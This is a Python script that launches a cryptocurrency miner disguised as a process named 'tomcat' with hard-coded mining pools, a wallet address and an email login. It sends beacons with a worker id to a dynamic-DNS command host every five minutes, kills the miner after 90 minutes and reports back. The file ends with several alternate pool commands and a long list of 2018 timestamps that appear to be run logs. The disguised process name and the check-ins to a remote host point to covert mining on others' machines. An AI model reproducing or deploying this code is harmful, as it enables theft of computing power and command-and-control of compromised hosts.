import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:03.872048
#2018-02-17 17:27:04.671151
#2018-02-17 19:15:08.018685
#2018-02-17 21:03:06.776512
#2018-02-17 22:48:06.604992
#2018-02-18 00:34:04.004626
#2018-02-18 02:24:04.087440
#2018-02-18 04:11:07.500504
#2018-02-18 06:03:05.294289
#2018-02-18 07:54:02.216706
#2018-02-18 09:43:02.155846
#2018-02-18 11:29:06.819088
#2018-02-18 13:15:07.254402
#2018-02-18 15:03:05.790423
#2018-02-18 16:51:07.247377
#2018-02-18 18:39:07.410890
#2018-02-18 20:26:06.436362
#2018-02-18 22:12:07.072833
#2018-02-19 00:01:06.902687
#2018-02-19 01:46:06.814615
#2018-02-19 03:34:03.617110
#2018-02-19 05:19:05.187911
#2018-02-19 07:05:09.394822
#2018-02-19 08:55:05.973089
#2018-02-19 10:44:08.051929
#2018-02-19 12:33:06.294490
#2018-02-19 14:19:06.866686
#2018-02-19 16:08:04.166651
#2018-02-19 17:55:07.482681
#2018-02-19 19:31:05.094023
#2018-02-19 21:05:09.583089
#2018-02-19 22:38:06.090225
#2018-02-20 00:09:06.601928
#2018-02-20 01:43:07.998625
#2018-02-20 03:18:08.841173
#2018-02-20 04:52:04.069556
#2018-02-20 06:22:06.569879
#2018-02-20 07:56:06.999183
#2018-02-20 09:29:07.569793
#2018-02-20 11:01:09.620370
#2018-02-20 12:37:07.869082
#2018-02-20 14:10:01.944963
#2018-02-20 15:42:07.668181
#2018-02-20 17:16:09.026823
#2018-02-20 18:53:12.708056
#2018-02-20 20:29:05.358740
#2018-02-20 21:59:05.836284
#2018-02-20 23:29:02.181266
#2018-02-21 01:04:04.281423
#2018-02-21 02:41:08.034563
#2018-02-21 04:14:07.890658
#2018-02-21 05:47:07.341143
#2018-02-21 07:22:01.508985
#2018-02-21 08:52:06.766629
#2018-02-21 10:24:07.268370
#2018-02-21 12:01:05.590373
#2018-02-21 13:34:03.720426
#2018-02-21 15:05:09.896655
#2018-02-21 16:42:01.794425
#2018-02-21 18:18:05.211100
#2018-02-21 19:46:03.662550
#2018-02-21 21:19:06.528762
#2018-02-21 22:53:06.234842
#2018-02-22 00:28:07.162547
#2018-02-22 01:58:07.013250
#2018-02-22 03:33:05.572055
#2018-02-22 05:04:08.223047
#2018-02-22 06:35:08.149117
#2018-02-22 08:10:01.466208
#2018-02-22 09:46:06.360422
#2018-02-22 11:16:06.935042
#2018-02-22 12:49:08.962269
#2018-02-22 14:21:08.640487
#2018-02-22 15:56:09.641769
#2018-02-22 17:28:03.685594
#2018-02-22 19:04:01.429509
#2018-02-22 20:42:01.238618
#2018-02-22 22:08:01.607204
#2018-02-22 23:42:09.145744
#2018-02-23 01:16:05.946566
#2018-02-23 02:50:01.816880
#2018-02-23 04:25:07.886244
#2018-02-23 05:56:04.336220
#2018-02-23 07:34:03.312613
#2018-02-23 09:35:08.670886
#2018-02-23 11:18:04.566205
#2018-02-23 12:37:05.947936
#2018-02-23 14:04:02.071931
#2018-02-23 15:41:04.715445
#2018-02-23 17:13:07.788741
#2018-02-23 18:47:05.118582
#2018-02-23 20:22:05.286096
#2018-02-23 21:55:04.479158
#2018-02-23 23:33:06.738547
#2018-02-24 01:01:06.800442
#2018-02-24 02:42:03.946192
#2018-02-24 04:19:08.150695
#2018-02-24 06:07:05.533120
#2018-02-24 07:54:08.255873
#2018-02-24 09:40:06.882901
#2018-02-24 11:36:05.286378
#2018-02-24 13:26:07.329645
#2018-02-24 15:15:09.508386
#2018-02-24 17:04:05.005652
#2018-02-24 18:56:06.364004
#2018-02-24 20:43:03.611144
#2018-02-24 22:56:04.830598
#2018-02-25 02:14:06.612049
#2018-02-25 05:45:05.741370
#2018-02-25 11:37:06.810331